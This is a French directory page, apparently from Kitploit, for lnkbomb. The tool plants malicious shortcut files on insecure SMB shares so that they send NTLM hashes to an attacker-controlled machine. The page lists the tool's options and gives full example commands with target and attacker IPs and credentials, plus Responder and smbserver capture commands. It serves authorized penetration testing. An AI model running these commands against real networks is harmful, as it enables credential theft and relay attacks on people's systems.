Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
lnkbomb — Générateur de raccourcis malveillants pour collecter les hashs NTLM à partir de partages de fichiers non sécurisés. | Kitploit
Outils/GitHubGitHub/dievus/lnkbomb
Attaques de Mots de PasseExploitationMouvement LatéralCollecte d'InformationsTests d'IntrusionRed TeamingArchived
GitHubdievus/lnkbomb

lnkbomb

Générateur de raccourcis malveillants pour collecter les hashs NTLM à partir de partages de fichiers non sécurisés.

Voir le dépôt
363627il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Lnkbomb

ko-fi

Lnkbomb est utilisé pour télécharger des fichiers de raccourci malveillants vers des partages de fichiers non sécurisés. La vulnérabilité existe car Windows cherche un fichier d'icône à associer au fichier de raccourci. Ce fichier d'icône peut être redirigé vers la machine d'un testeur d'intrusion exécutant Responder ou smbserver pour collecter les hachages NTLMv1 ou NTLMv2 (selon la configuration de la machine victime). Le testeur peut ensuite tenter de casser ces hachages collectés hors ligne avec un outil comme Hashcat, ou les relayer vers un outil comme ntlmrelayx pour une exploitation plus poussée.

Le fichier de charge utile est téléchargé directement sur le partage non sécurisé spécifié par le testeur dans la ligne de commande. Le testeur inclut également son adresse IP, qui est écrite dans la charge utile.

La version 2.0 est une refonte totale de l'outil et utilise la bibliothèque pysmb, permettant des dépôts de charge utile non authentifiés et authentifiés.

Utilisation en Python

Installation de Lnkbomb

Notez que le projet fonctionne de manière cohérente sous Windows. Il peut rencontrer des problèmes sous Linux.

git clone https://github.com/dievus/lnkbomb.git

Déplacez-vous dans le répertoire lnkbomb et exécutez :

python3 lnkbomb.py -h

Cela affichera le menu d'aide, qui contient les options suivantes :

-h, --help - Affiche les options d'aide

-t, --target - Spécifie l'adresse IP cible

-a, --attacker - Spécifie l'adresse IP de la machine d'attaque du testeur

-r, --recover - Utilisé pour supprimer la charge utile une fois les tests terminés (ex. -r payloadname.url)

-w, --windows - Nouvelle commande - nécessaire pour définir les ports appropriés pour les partages Windows

-l, --linux - Nouvelle commande - nécessaire pour définir les ports appropriés pour les partages Linux

-n, --netbios - Nouvelle commande - le nom NetBIOS des machines Windows ciblées doit être inclus

Exemples de commandes complètes :

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

Vous devrez utiliser un outil comme Responder ou smbserver pour capturer le hachage NTLM.
responder -I eth0 -dwFP -v

ou

smbserver.py . . -smb2support

Remarques

Veuillez garder à l'esprit que cet outil est destiné uniquement à des fins de tests d'intrusion et de piratage éthique. Je ne cautionne aucun comportement qui consisterait à tester des cibles pour lesquelles vous n'avez pas actuellement l'autorisation de tester.

Cet outil peut fonctionner ou non selon les correctifs et les versions de la cible. L'expérience utilisateur peut varier.

Je sais que ce sont des raccourcis .url et non des extensions .lnk. Je le fais pour vous titiller.

Télécharger l’outil